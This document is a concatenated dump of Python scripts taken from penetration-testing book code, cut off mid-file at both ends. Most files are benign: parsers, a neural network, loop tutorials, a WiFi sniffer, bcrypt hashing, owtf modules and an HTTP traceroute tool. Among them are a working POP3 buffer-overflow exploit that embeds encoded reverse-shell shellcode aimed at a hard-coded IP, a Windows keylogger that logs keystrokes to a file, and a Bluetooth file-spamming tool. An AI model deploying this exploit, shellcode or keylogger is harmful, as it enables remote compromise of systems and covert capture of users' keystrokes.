parser.add_option('-r', '--repeat', dest='repeat', metavar='REPEAT', help='Number of times to repeat file sending after finding a device (default - 1)', default='1')
parser.add_option('-s', '--spam', dest='spam', action='store_true', help='Spam found devices with the file continuosly')
print '\nBluetooth file carpet bombing via OBEX Object Push'
print 'Mariusz Banach / MGeeky 16\n'
(opts, args) = parser.parse_args()
if opts.file != '':
if not os.path.exists(opts.file):
print '[!] Specified file: "%s" does not exists.'
sys.exit(0)
print '[+] Started Bluetooth scanning. Ctr-C to stop...'
timeout = float(opts.time)
try:
while True:
findDevs(opts)
time.sleep(timeout)
except KeyboardInterrupt, e:
print '\n[?] User interruption.'
if __name__ == '__main__':
main() | 30.509804 | 169 | 0.607221 |
cybersecurity-penetration-testing | import urllib2
import sys
__author__ = 'Preston Miller and Chapin Bryce'
__date__ = '20160401'
__version__ = 0.02
__description__ = """Reads Linux-usb.org's USB.ids file and parses into usable data for parsing VID/PIDs"""
def main():
ids = get_ids()
usb_file = get_usb_file()
usbs = parse_file(usb_file)
search_key(usbs, ids)
def get_ids():
if len(sys.argv) >= 3:
return sys.argv[1], sys.argv[2]
else:
print 'Please provide the vendor Id and product Id separated by spaces. on the command line'
sys.exit(1)
def get_usb_file():
url = 'http://www.linux-usb.org/usb.ids'
return urllib2.urlopen(url)
def parse_file(usb_file):
usbs = {}
curr_id = ''
for line in usb_file:
if line.startswith('#') or line == '\n':
pass
else:
if not(line.startswith('\t')) and (line[0].isdigit() or line[0].islower()):
usb_id, name = getRecord(line.strip())
curr_id = usb_id
usbs[usb_id] = [name, {}]
elif line.startswith('\t') and line.count('\t') == 1:
usb_id, name = getRecord(line.strip())
usbs[curr_id][1][usb_id] = name
return usbs
def getRecord(record_line):
split = record_line.find(' ')
record_id = record_line[:split]
record_name = record_line[split + 1:]
return record_id, record_name
def search_key(usb_dict, ids):
vendor_key = ids[0]
product_key = ids[1]
try:
vendor = usb_dict[vendor_key][0]
except KeyError:
vendor = 'Unknown'
try:
product = usb_dict[vendor_key][1][product_key]
except KeyError:
product = 'Unknown'
return vendor, product
| 24.382353 | 107 | 0.569855 |
Mastering-Machine-Learning-for-Penetration-Testing | """
network.py
~~~~~~~~~~
A module to implement the stochastic gradient descent learning
algorithm for a feedforward neural network. Gradients are calculated
using backpropagation. Note that I have focused on making the code
simple, easily readable, and easily modifiable. It is not optimized,
and omits many desirable features.
"""
#### Libraries
# Standard library
import random
# Third-party libraries
import numpy as np
class Network(object):
def __init__(self, sizes):
"""The list ``sizes`` contains the number of neurons in the
respective layers of the network. For example, if the list
was [2, 3, 1] then it would be a three-layer network, with the
first layer containing 2 neurons, the second layer 3 neurons,
and the third layer 1 neuron. The biases and weights for the
network are initialized randomly, using a Gaussian
distribution with mean 0, and variance 1. Note that the first
layer is assumed to be an input layer, and by convention we
won't set any biases for those neurons, since biases are only
ever used in computing the outputs from later layers."""
self.num_layers = len(sizes)
self.sizes = sizes
self.biases = [np.random.randn(y, 1) for y in sizes[1:]]
self.weights = [np.random.randn(y, x)
for x, y in zip(sizes[:-1], sizes[1:])]
def adversarial(self, n):
goal = np.zeros((10, 1))
goal[n] = 1
x = np.random.normal(.5, .3, (784, 1))
orig = np.copy(x)
for i in range(10000):
d = self.input_derivative(x,goal)
x -= .01 * d
return x
def feedforward(self, a):
"""Return the output of the network if ``a`` is input."""
for b, w in zip(self.biases, self.weights):
a = sigmoid(np.dot(w, a)+b)
return a
def SGD(self, training_data, epochs, mini_batch_size, eta,
test_data=None):
"""Train the neural network using mini-batch stochastic
gradient descent. The ``training_data`` is a list of tuples
``(x, y)`` representing the training inputs and the desired
outputs. The other non-optional parameters are
self-explanatory. If ``test_data`` is provided then the
network will be evaluated against the test data after each
epoch, and partial progress printed out. This is useful for
tracking progress, but slows things down substantially."""
if test_data: n_test = len(test_data)
n = len(training_data)
for j in xrange(epochs):
random.shuffle(training_data)
mini_batches = [
training_data[k:k+mini_batch_size]
for k in xrange(0, n, mini_batch_size)]
for mini_batch in mini_batches:
self.update_mini_batch(mini_batch, eta)
if test_data:
print("Epoch {0}: {1} / {2}".format(
j, self.evaluate(test_data), n_test))
else:
print("Epoch {0} complete".format(j))
def update_mini_batch(self, mini_batch, eta):
"""Update the network's weights and biases by applying
gradient descent using backpropagation to a single mini batch.
The ``mini_batch`` is a list of tuples ``(x, y)``, and ``eta``
is the learning rate."""
nabla_b = [np.zeros(b.shape) for b in self.biases]
nabla_w = [np.zeros(w.shape) for w in self.weights]
for x, y in mini_batch:
delta_nabla_b, delta_nabla_w = self.backprop(x, y)
nabla_b = [nb+dnb for nb, dnb in zip(nabla_b, delta_nabla_b)]
nabla_w = [nw+dnw for nw, dnw in zip(nabla_w, delta_nabla_w)]
self.weights = [w-(eta/len(mini_batch))*nw
for w, nw in zip(self.weights, nabla_w)]
self.biases = [b-(eta/len(mini_batch))*nb
for b, nb in zip(self.biases, nabla_b)]
def backprop(self, x, y):
"""Return a tuple ``(nabla_b, nabla_w)`` representing the
gradient for the cost function C_x. ``nabla_b`` and
``nabla_w`` are layer-by-layer lists of numpy arrays, similar
to ``self.biases`` and ``self.weights``."""
nabla_b = [np.zeros(b.shape) for b in self.biases]
nabla_w = [np.zeros(w.shape) for w in self.weights]
# feedforward
activation = x
activations = [x] # list to store all the activations, layer by layer
zs = [] # list to store all the z vectors, layer by layer
for b, w in zip(self.biases, self.weights):
z = np.dot(w, activation)+b
zs.append(z)
activation = sigmoid(z)
activations.append(activation)
# backward pass
delta = self.cost_derivative(activations[-1], y) * \
sigmoid_prime(zs[-1])
nabla_b[-1] = delta
nabla_w[-1] = np.dot(delta, activations[-2].transpose())
# Note that the variable l in the loop below is used a little
# differently to the notation in Chapter 2 of the book. Here,
# l = 1 means the last layer of neurons, l = 2 is the
# second-last layer, and so on. It's a renumbering of the
# scheme in the book, used here to take advantage of the fact
# that Python can use negative indices in lists.
for l in xrange(2, self.num_layers):
z = zs[-l]
sp = sigmoid_prime(z)
delta = np.dot(self.weights[-l+1].transpose(), delta) * sp
nabla_b[-l] = delta
nabla_w[-l] = np.dot(delta, activations[-l-1].transpose())
return (nabla_b, nabla_w)
def input_derivative(self, x, y):
""" Calculate derivatives wrt the inputs"""
nabla_b = [np.zeros(b.shape) for b in self.biases]
nabla_w = [np.zeros(w.shape) for w in self.weights]
# feedforward
activation = x
activations = [x] # list to store all the activations, layer by layer
zs = [] # list to store all the z vectors, layer by layer
for b, w in zip(self.biases, self.weights):
z = np.dot(w, activation)+b
zs.append(z)
activation = sigmoid(z)
activations.append(activation)
# backward pass
delta = self.cost_derivative(activations[-1], y) * \
sigmoid_prime(zs[-1])
nabla_b[-1] = delta
nabla_w[-1] = np.dot(delta, activations[-2].transpose())
# Note that the variable l in the loop below is used a little
# differently to the notation in Chapter 2 of the book. Here,
# l = 1 means the last layer of neurons, l = 2 is the
# second-last layer, and so on. It's a renumbering of the
# scheme in the book, used here to take advantage of the fact
# that Python can use negative indices in lists.
for l in xrange(2, self.num_layers):
z = zs[-l]
sp = sigmoid_prime(z)
delta = np.dot(self.weights[-l+1].transpose(), delta) * sp
nabla_b[-l] = delta
nabla_w[-l] = np.dot(delta, activations[-l-1].transpose())
return self.weights[0].T.dot(delta)
def evaluate(self, test_data):
"""Return the number of test inputs for which the neural
network outputs the correct result. Note that the neural
network's output is assumed to be the index of whichever
neuron in the final layer has the highest activation."""
test_results = [(np.argmax(self.feedforward(x)), y)
for (x, y) in test_data]
return sum(int(x == y) for (x, y) in test_results)
def cost_derivative(self, output_activations, y):
"""Return the vector of partial derivatives \partial C_x /
\partial a for the output activations."""
return (output_activations-y)
#### Miscellaneous functions
def sigmoid(z):
"""The sigmoid function."""
return 1.0/(1.0+np.exp(-z))
def sigmoid_prime(z):
"""Derivative of the sigmoid function."""
return sigmoid(z)*(1-sigmoid(z))
| 42.331551 | 77 | 0.591953 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
import socket
buffer=["A"]
counter=100
LPORT1433 = ""
LPORT1433 += "\x9b\x98\x40\x48\x4b\x98\xd6\x41\x41\x42\xda\xd8"
LPORT1433 += "\xd9\x74\x24\xf4\xbd\x24\x8b\x25\x21\x58\x29\xc9"
LPORT1433 += "\xb1\x52\x83\xe8\xfc\x31\x68\x13\x03\x4c\x98\xc7"
LPORT1433 += "\xd4\x70\x76\x85\x17\x88\x87\xea\x9e\x6d\xb6\x2a"
LPORT1433 += "\xc4\xe6\xe9\x9a\x8e\xaa\x05\x50\xc2\x5e\x9d\x14"
LPORT1433 += "\xcb\x51\x16\x92\x2d\x5c\xa7\x8f\x0e\xff\x2b\xd2"
LPORT1433 += "\x42\xdf\x12\x1d\x97\x1e\x52\x40\x5a\x72\x0b\x0e"
LPORT1433 += "\xc9\x62\x38\x5a\xd2\x09\x72\x4a\x52\xee\xc3\x6d"
LPORT1433 += "\x73\xa1\x58\x34\x53\x40\x8c\x4c\xda\x5a\xd1\x69"
LPORT1433 += "\x94\xd1\x21\x05\x27\x33\x78\xe6\x84\x7a\xb4\x15"
LPORT1433 += "\xd4\xbb\x73\xc6\xa3\xb5\x87\x7b\xb4\x02\xf5\xa7"
LPORT1433 += "\x31\x90\x5d\x23\xe1\x7c\x5f\xe0\x74\xf7\x53\x4d"
LPORT1433 += "\xf2\x5f\x70\x50\xd7\xd4\x8c\xd9\xd6\x3a\x05\x99"
LPORT1433 += "\xfc\x9e\x4d\x79\x9c\x87\x2b\x2c\xa1\xd7\x93\x91"
LPORT1433 += "\x07\x9c\x3e\xc5\x35\xff\x56\x2a\x74\xff\xa6\x24"
LPORT1433 += "\x0f\x8c\x94\xeb\xbb\x1a\x95\x64\x62\xdd\xda\x5e"
LPORT1433 += "\xd2\x71\x25\x61\x23\x58\xe2\x35\x73\xf2\xc3\x35"
LPORT1433 += "\x18\x02\xeb\xe3\x8f\x52\x43\x5c\x70\x02\x23\x0c"
LPORT1433 += "\x18\x48\xac\x73\x38\x73\x66\x1c\xd3\x8e\xe1\xe3"
LPORT1433 += "\x8c\x6a\x63\x8b\xce\x8a\x81\xd5\x46\x6c\xe3\xf5"
LPORT1433 += "\x0e\x27\x9c\x6c\x0b\xb3\x3d\x70\x81\xbe\x7e\xfa"
LPORT1433 += "\x26\x3f\x30\x0b\x42\x53\xa5\xfb\x19\x09\x60\x03"
LPORT1433 += "\xb4\x25\xee\x96\x53\xb5\x79\x8b\xcb\xe2\x2e\x7d"
LPORT1433 += "\x02\x66\xc3\x24\xbc\x94\x1e\xb0\x87\x1c\xc5\x01"
LPORT1433 += "\x09\x9d\x88\x3e\x2d\x8d\x54\xbe\x69\xf9\x08\xe9"
LPORT1433 += "\x27\x57\xef\x43\x86\x01\xb9\x38\x40\xc5\x3c\x73"
LPORT1433 += "\x53\x93\x40\x5e\x25\x7b\xf0\x37\x70\x84\x3d\xd0"
LPORT1433 += "\x74\xfd\x23\x40\x7a\xd4\xe7\x70\x31\x74\x41\x19"
LPORT1433 += "\x9c\xed\xd3\x44\x1f\xd8\x10\x71\x9c\xe8\xe8\x86"
LPORT1433 += "\xbc\x99\xed\xc3\x7a\x72\x9c\x5c\xef\x74\x33\x5c"
LPORT1433 += "\x3a"
#Bingo this works--Had an issue with bad chars.Rev shell also works like charm
buffer = '\x41' * 2606
if 1:
print"Fuzzing PASS with %s bytes" % len(buffer)
#print str(string)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.250.136',110))
data=s.recv(1024)
#print str(data)
s.send('USER username \r\n')
data=s.recv(1024)
print str(data)
s.send('PASS ' + buffer + '\x8f\x35\x4a\x5f'+ LPORT1433 + '\r\n')
#data=s.recv(1024)
#print str(data)
print "done"
#s.send('QUIT\r\n')
s.close()
| 40.903226 | 78 | 0.680786 |
Hands-On-Penetration-Testing-with-Python | #! /usr/bin/python3.5
i=0
print("------ While Basics ------")
while i < 5:
print("Without Braces : Statement %s "%i)
i=i+1
i=0
while (i < 5):
print("With Braces : Statement %s "%i)
i=i+1
print("------- While with Lists ------")
my_list=[1,2,"a","b",33.33,"c",4,5,['item 1','item 2']]
i=0
while(i < len(my_list)):
if (type(my_list[i]) == type(1)):
print ("Found Integer : %s "%my_list[i])
elif (type(my_list[i]) == type("a")):
print ("Found String : %s "%my_list[i])
elif (type(my_list[i]) == type([])):
print("------Found Inner list -Now lets iterate:---------")
j=0
while(j< len(my_list[i])):
print("Inner Item : %s "%my_list[i][j])
j =j +1
else:
print("Neither integer nor string : %s and Type is : %s "%(my_list[i],type(my_list[i])))
i=i+1
| 22.515152 | 90 | 0.540645 |
cybersecurity-penetration-testing | from scapy.all import *
import struct
interface = 'mon0'
ap_list = []
def info(fm):
if fm.haslayer(Dot11):
if ((fm.type == 0) & (fm.subtype==8)):
if fm.addr2 not in ap_list:
ap_list.append(fm.addr2)
print "SSID--> ",fm.info,"-- BSSID --> ",fm.addr2, \
"-- Channel--> ", ord(fm[Dot11Elt:3].info)
sniff(iface=interface,prn=info)
| 23.857143 | 56 | 0.608069 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/python
# -*- coding: utf-8 -*-
import bcrypt
# Let's first enter a password
new = raw_input('Please enter a password: ')
# We'll encrypt the password with bcrypt with the default salt value of 12
hashed = bcrypt.hashpw(new, bcrypt.gensalt())
# We'll print the hash we just generated
print('The string about to be stored is: ' + hashed)
# Confirm we entered the correct password
plaintext = raw_input('Please re-enter the password to check: ')
# Check if both passwords match
if bcrypt.hashpw(plaintext, hashed) == hashed:
print 'It\'s a match!'
else:
print 'Please try again.'
| 32.222222 | 74 | 0.716918 |
owtf | """
owtf.models.session
~~~~~~~~~~~~~~~~~~~
"""
from sqlalchemy import Boolean, Column, Integer, String
from sqlalchemy.orm import relationship
from owtf.db.model_base import Model
from owtf.lib import exceptions
from owtf.models.target import target_association_table
class Session(Model):
__tablename__ = "sessions"
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=True)
active = Column(Boolean, default=False)
targets = relationship("Target", secondary=target_association_table, backref="sessions")
@classmethod
def get_by_id(cls, session, id):
session_obj = session.query(Session).get(id)
if not session_obj:
raise exceptions.InvalidSessionReference("No session with id: {!s}".format(id))
return session_obj.to_dict()
@classmethod
def get_active(cls, session):
session_id = session.query(Session.id).filter_by(active=True).first()
return session_id
@classmethod
def set_by_id(cls, session, session_id):
query = session.query(Session)
session_obj = query.get(session_id)
if not session_obj:
raise exceptions.InvalidSessionReference("No session with session_id: {!s}".format(session_id))
query.update({"active": False})
session_obj.active = True
session.commit()
| 30.837209 | 107 | 0.66886 |
cybersecurity-penetration-testing | import os,sys
from PIL import Image
from PIL.ExifTags import TAGS
for (i,j) in Image.open('image.jpg')._getexif().iteritems():
print '%s = %s' % (TAGS.get(i), j)
| 23.571429 | 60 | 0.643275 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import dpkt
import socket
def printPcap(pcap):
for (ts, buf) in pcap:
try:
eth = dpkt.ethernet.Ethernet(buf)
ip = eth.data
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
print '[+] Src: ' + src + ' --> Dst: ' + dst
except:
pass
def main():
f = open('geotest.pcap')
pcap = dpkt.pcap.Reader(f)
printPcap(pcap)
if __name__ == '__main__':
main()
| 17.392857 | 56 | 0.490272 |
cybersecurity-penetration-testing | from scapy.all import *
interface = 'mon0'
ap_list = []
def info(fm):
if fm.haslayer(Dot11):
if ((fm.type == 0) & (fm.subtype==8)):
if fm.addr2 not in ap_list:
ap_list.append(fm.addr2)
print "SSID--> ",fm.info,"-- BSSID --> ",fm.addr2
sniff(iface=interface,prn=info)
| 21.307692 | 53 | 0.602076 |
owtf | """
owtf.shell.utils
~~~~~~~~~~~~~~~~
# Inspired from:
# http://code.activestate.com/recipes/440554-module-to-allow-asynchronous-subprocess-use-on-win/
"""
import errno
import os
import platform
import subprocess
import sys
import time
if platform.system() == "Windows":
from win32file import ReadFile, WriteFile
from win32pipe import PeekNamedPipe
import msvcrt
else:
import select
import fcntl
PIPE = subprocess.PIPE
DISCONNECT_MESSAGE = "Other end disconnected!"
class DisconnectException(Exception):
def __init__(self, value):
self.parameter = value
def __str__(self):
return repr(self.parameter)
class AsyncPopen(subprocess.Popen):
def recv(self, maxsize=None):
return self._recv("stdout", maxsize)
def recv_err(self, maxsize=None):
return self._recv("stderr", maxsize)
def send_recv(self, input="", maxsize=None):
return self.send(input), self.recv(maxsize), self.recv_err(maxsize)
def get_conn_maxsize(self, which, maxsize):
if maxsize is None:
maxsize = 1024
elif maxsize < 1:
maxsize = 1
return getattr(self, which), maxsize
def _close(self, which):
getattr(self, which).close()
setattr(self, which, None)
if hasattr(subprocess, "mswindows"):
def send(self, input):
if not self.stdin:
return None
try:
x = msvcrt.get_osfhandle(self.stdin.fileno())
(errCode, written) = WriteFile(x, input)
except ValueError:
return self._close("stdin")
except (subprocess.pywintypes.error, Exception) as why:
if why[0] in (109, errno.ESHUTDOWN):
return self._close("stdin")
raise
return written
def _recv(self, which, maxsize):
conn, maxsize = self.get_conn_maxsize(which, maxsize)
if conn is None:
return None
try:
x = msvcrt.get_osfhandle(conn.fileno())
(read, navail, nMessage) = PeekNamedPipe(x, 0)
if maxsize < navail:
nAvail = maxsize
if navail > 0:
(errCode, read) = ReadFile(x, navail, None)
except ValueError:
return self._close(which)
except (subprocess.pywintypes.error, Exception) as why:
if why[0] in (109, errno.ESHUTDOWN):
return self._close(which)
raise
if self.universal_newlines:
read = self._translate_newlines(read)
return read
else:
def send(self, input):
if not self.stdin:
return None
if not select.select([], [self.stdin], [], 0)[1]:
return 0
try:
written = os.write(self.stdin.fileno(), input)
except OSError as why:
if why[0] == errno.EPIPE: # broken pipe
return self._close("stdin")
raise
return written
def _recv(self, which, maxsize):
conn, maxsize = self.get_conn_maxsize(which, maxsize)
if conn is None:
return None
flags = fcntl.fcntl(conn, fcntl.F_GETFL)
if not conn.closed:
fcntl.fcntl(conn, fcntl.F_SETFL, flags | os.O_NONBLOCK)
try:
if not select.select([conn], [], [], 0)[0]:
return ""
r = conn.read(maxsize)
if not r:
return self._close(which)
if self.universal_newlines:
r = self._translate_newlines(r)
return r
finally:
if not conn.closed:
fcntl.fcntl(conn, fcntl.F_SETFL, flags)
def recv_some(p, t=.1, e=1, tr=5, stderr=0):
if tr < 1:
tr = 1
x = time.time() + t
y = []
r = ""
pr = p.recv
if stderr:
pr = p.recv_err
while time.time() < x or r:
r = pr()
if r is None:
if e:
raise DisconnectException(DISCONNECT_MESSAGE)
else:
break
elif r:
y.append(r)
else:
time.sleep(max((x - time.time()) / tr, 0))
return "".join(y)
def send_all(p, data):
while len(data):
sent = p.send(data)
if sent is None:
raise DisconnectException(DISCONNECT_MESSAGE)
import sys
if sys.version_info > (3,):
buffer = memoryview
data = buffer(data)
if __name__ == "__main__":
if sys.platform == "win32":
shell, commands, tail = ("cmd", ("dir /w", "echo HELLO WORLD"), "\r\n")
else:
shell, commands, tail = ("sh", ("ls", "echo HELLO WORLD"), "\n")
a = AsyncPopen(shell, stdin=PIPE, stdout=PIPE)
print(recv_some(a))
for cmd in commands:
send_all(a, cmd + tail)
print(recv_some(a))
send_all(a, "exit" + tail)
print(recv_some(a, e=0))
a.wait()
| 27.672222 | 96 | 0.517054 |
thieves-tools | import click
from lib import cheatsheet, question
# @click.group(invoke_without_command=True)
@click.group()
@click.pass_context
@click.help_option("-h", "--help")
def cli(ctx):
"""
Should fill this in :P
"""
pass
cli.add_command(cheatsheet)
cli.add_command(question)
| 13.842105 | 43 | 0.697509 |
owtf | #!/usr/bin/env python
try:
import http.server as server
except ImportError:
import BaseHTTPServer as server
import getopt
import re
import sys
try:
from urllib.parse import urlparse, urlencode
from urllib.request import urlopen, Request
from urllib.error import HTTPError, URLError
from urllib.request import (
HTTPHandler,
HTTPSHandler,
HTTPRedirectHandler,
ProxyHandler,
build_opener,
install_opener,
)
except ImportError:
from urlparse import urlparse
from urllib import urlencode
from urllib2 import (
urlopen,
Request,
HTTPError,
HTTPHandler,
HTTPSHandler,
HTTPRedirectHandler,
ProxyHandler,
build_opener,
install_opener,
URLError,
)
################## HEADER ###################################
#
# Traceroute-like HTTP scanner
# Using the "Max-Forwards" header
# RFC 2616 - HTTP/1.1 - Section 14.31
# RFC 3261 - SIP - Section 8.1.1.6
#
#
# By Nicolas Gregoire ([email protected])
#
# 0.5 : First public release
# 0.4 : Private release, looking for bugs - More heuristics
# 0.3 : A lot more options - More verbosity levels - Some heuristics
#
# By Julien Cayssol ([email protected])
#
# 0.2 : Add extract of headers
# 0.1 : Initial version
#
#
# Heuristics :
# - Status Codes :
# - HTTP Status Code == 502
# - HTTP Status Code == 483
# - Specific data in body or headers :
# - X-Forwarded-For in body when using TRACE
# - Via or X-Via in headers
# - Differences between hops :
# - HTTP Status Codes
# - Server headers
# - Content-Type headers
# - Via headers
# - HTML titles
# - HTML <address> tags
# - X-Forwarded-For values when using TRACE
#
############## GLOBAL VARIABLES ###################################
global_data = {
"StatusCode": {},
"Server": {},
"Content-Type": {},
"Title": {},
"Address": {},
"X-Fwd": {},
"Via": {},
}
score = 0
verbosity = 0
scheme = "http"
host = "127.0.0.1"
port = "80"
path = "/"
method = "TRACE"
body_content = None
max_fwds = 3
userAgent = (
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.2) Gecko/20060502 Firefox/1.5.0.2"
)
contentType = "text/html"
############## FUNCTIONS ###################################
# Pretty printing
def zprint(string, flag="=="):
print("[" + flag + "] " + string)
# Increment the heuristic score
def inc_score():
global score
score = score + 1
if verbosity:
zprint("Score : " + str(score), "!!")
# Help
def showUsage():
print(
"Usage : "
+ sys.argv[0]
+ " [-h] [-m method] [-s scheme] [-t target] [-p port] [-P path] [-v 0|1|2] [-f forwards]"
)
print("\t[-h] Help (this text)")
print('\t[-m] HTTP Method : default is "TRACE"')
print('\t[-s] Scheme : default is "http"')
print('\t[-t] Target host : default is "127.0.0.1"')
print('\t[-p] Port : default is "80"')
print('\t[-P] Path : default is "/"')
print('\t[-f] Max # of forwards : default is "3"')
print("\t[-v] Verbosity : 0 = default, 1 = verbose, 2 = debug")
print("Examples :")
print(sys.argv[0] + " -t www.example.org")
print(" => TRACE /")
print(sys.argv[0] + " -t www.example.org -m GET -s https -p 443 -v 1")
print(" => GET / on a SSL host")
print(sys.argv[0] + " -t www.example.org -m POST -P /axis2/checkacc -v 2 -f 5")
print(" => Debug mode on a specific end-point")
sys.exit(1)
# Parse CLI args
def getArguments():
try:
if len(sys.argv) < 2:
zprint('No arguments ? Probably a bad choice. Use "-h" ...', "!!")
sys.exit(1)
optlist, list = getopt.getopt(sys.argv[1:], "hm:s:t:p:P:v:f:")
except getopt.GetoptError:
showUsage()
for opt in optlist:
if opt[0] == "-h":
showUsage()
if opt[0] == "-m":
global method
method = opt[1]
if opt[0] == "-s":
global scheme
scheme = opt[1]
if opt[0] == "-t":
global host
host = opt[1]
if opt[0] == "-p":
global port
port = opt[1]
if opt[0] == "-P":
global path
path = opt[1]
if opt[0] == "-v":
global verbosity
verbosity = int(opt[1])
if opt[0] == "-f":
global max_fwds
max_fwds = int(opt[1])
# Extract some interesting data from the headers
def analyse_headers(data):
if verbosity:
zprint("Analyzing headers", "**")
wanted_headers = [
"Server",
"Via",
"X-Via",
"Set-Cookie",
"X-Forwarded-For",
"Content-Type",
"Content-Length",
"Last-Modified",
"Location",
"Date",
]
for h_name in wanted_headers:
h_value = data.get(h_name)
if h_value != None:
# Print the value
if verbosity:
zprint(h_value, h_name)
# Add it to the global structure if needed
if h_name == "Server" or h_name == "Content-Type":
global_data[h_name][hop] = h_value
# Some heuristics
if h_name == "Via" or h_name == "X-Via":
zprint('"Via" header : Probably a reverse proxy', "++")
global_data["Via"][hop] = h_value
inc_score()
# Extract some interesting data from the body
def analyse_body(data):
if verbosity:
zprint("Analyzing body", "**")
wanted_patterns = [
"<title>(.*)</title>",
"<address>(.*)</address>",
"Reason: <strong>(.*)</strong>",
"X-Forwarded-For: (.*)",
]
for p_name in wanted_patterns:
# Case insensitive search
p_value = re.search(p_name, str(data), re.IGNORECASE)
if p_value != None:
# Only the 1st group, without newlines
value = p_value.groups()[0].strip("\r\n")
if verbosity:
zprint(value, p_name)
# Add it to the global structure if needed
if p_name == "<title>(.*)</title>":
global_data["Title"][hop] = value
if p_name == "<address>(.*)</address>":
global_data["Address"][hop] = value
# Some heuristics
if re.search("X-Forwarded-For:", p_name):
global_data["X-Fwd"][hop] = value
if method == "TRACE":
zprint(
'"X-Forwarded-For" in body when using TRACE : Probably a reverse proxy',
"++",
)
inc_score()
# Analyse the data returned by urllib2.*open()
def debug_and_parse(data):
# Get data
headers = data.info()
body = data.read()
# Debug
if verbosity == 2:
zprint(str(headers), "DEBUG HEADERS")
zprint(str(body), "DEBUG BODY")
# Extract some interesting info
codes = server.BaseHTTPRequestHandler.responses
global_data["StatusCode"][hop] = str(data.code) + " " + codes[data.code][0]
analyse_headers(headers)
analyse_body(body)
############## SCAN ###################################
# Init
getArguments()
# Current target
url = scheme + "://" + host + ":" + port + path
zprint("Target URL : " + url)
zprint("Used method : " + method)
zprint("Max number of hops : " + str(max_fwds))
# Scan
for hop in range(0, max_fwds):
# Create the request object
request = Request(url)
request.get_method = lambda: method
request.data = body_content
request.add_header("Content-Type", contentType)
request.add_header("User-agent", userAgent)
# Add the 'Max-Forwards' header
request.add_header("Max-Forwards", hop)
if verbosity:
print("-" * 80)
zprint(
'Current value of "Max-Forwards" = ' + str(hop) + " [" + "-" * 20 + "]",
"-" * 19,
)
print("-" * 80)
try:
# Do the HTTP request
opener = build_opener(HTTPHandler)
result = opener.open(request)
# Found something
if verbosity:
zprint("Status Code => HTTP 200: OK", "**")
# Analyse it
debug_and_parse(result)
# Not a 200 OK
except HTTPError as e:
if verbosity:
zprint("Status Code => " + str(e), "**")
# Some heuristics
if e.code == 502:
zprint("HTTP 502 : Probably a reverse proxy", "++")
inc_score()
if e.code == 483:
zprint("HTTP 483 : Probably a reverse proxy (SIP ?)", "++")
inc_score()
# Analyse it
debug_and_parse(e)
# Network problem
except URLError as e:
zprint("Network problem !", "!!")
zprint("Reason : " + str(e.reason), "!!")
break
############## REPORT ###################################
print("-" * 80)
zprint("Heuristic Report [" + "-" * 31 + "]", "-" * 27)
print("-" * 80)
# For each key
for k in list(global_data.keys()):
string = k + ":\n"
previous = "Undef"
# For each hop
ok = 0
for i in range(0, max_fwds):
# Try this key
try:
current = global_data[k][i]
# We got a value !
ok = 1
except KeyError:
current = "Undef"
# Some heuristics
if previous != current and i > 0:
inc_score()
# Then add it to the current string
string = string + "\tHop #" + str(i) + " : " + current + "\n"
previous = current
# Display this key only if values were found
if ok:
print(string)
# Final score
if score == 0:
zprint("No reverse proxy", "--")
else:
zprint("Found a reverse proxy, score is " + str(score), "++")
| 25.374663 | 98 | 0.518704 |
Python-for-Offensive-PenTest | # Python For Offensive PenTest
# pyHook download link
# http://sourceforge.net/projects/pyhook/files/pyhook/1.5.1/
# pythoncom download link
# http://sourceforge.net/projects/pywin32/files/pywin32/Build%20219/
# Keylogger
import pythoncom, pyHook
#Again, once the user hit any keyboard button, keypressed func will be executed and that action will be store in event
def keypressed(event):
global store
#Enter and backspace are not handled properly that's why we hardcode thier values to < Enter > and <BACK SPACE>
# note that we can know if the user input was enter or backspace based on thier ASCII values
if event.Ascii==13:
keys=' < Enter > '
elif event.Ascii==8:
keys=' <BACK SPACE> '
else:
keys=chr(event.Ascii)
store = store + keys #at the end we append the ascii keys into store variable and finally write them in keylogs text file
fp=open("keylogs.txt","w")
fp.write(store)
fp.close()
return True # after intercetping the keyboard we have to return a True value otherwise we will simply disable the keyboard functionality
store = '' # string where we will store all the pressed keys
#Next we create and register a hook manager and once the user hit any keyboard button, keypressed
#func will be executed and that action will be store in event
obj = pyHook.HookManager()
obj.KeyDown = keypressed
obj.HookKeyboard() #start the hooking loop and pump out the messages
pythoncom.PumpMessages() #remember that per Pyhook documentation we must have a Windows message pump
| 27.035088 | 140 | 0.717595 |
cybersecurity-penetration-testing | # Primality Testing with the Rabin-Miller Algorithm
# http://inventwithpython.com/hacking (BSD Licensed)
import random
def rabinMiller(num):
# Returns True if num is a prime number.
s = num - 1
t = 0
while s % 2 == 0:
# keep halving s until it is even (and use t
# to count how many times we halve s)
s = s // 2
t += 1
for trials in range(5): # try to falsify num's primality 5 times
a = random.randrange(2, num - 1)
v = pow(a, s, num)
if v != 1: # this test does not apply if v is 1.
i = 0
while v != (num - 1):
if i == t - 1:
return False
else:
i = i + 1
v = (v ** 2) % num
return True
def isPrime(num):
# Return True if num is a prime number. This function does a quicker
# prime number check before calling rabinMiller().
if (num < 2):
return False # 0, 1, and negative numbers are not prime
# About 1/3 of the time we can quickly determine if num is not prime
# by dividing by the first few dozen prime numbers. This is quicker
# than rabinMiller(), but unlike rabinMiller() is not guaranteed to
# prove that a number is prime.
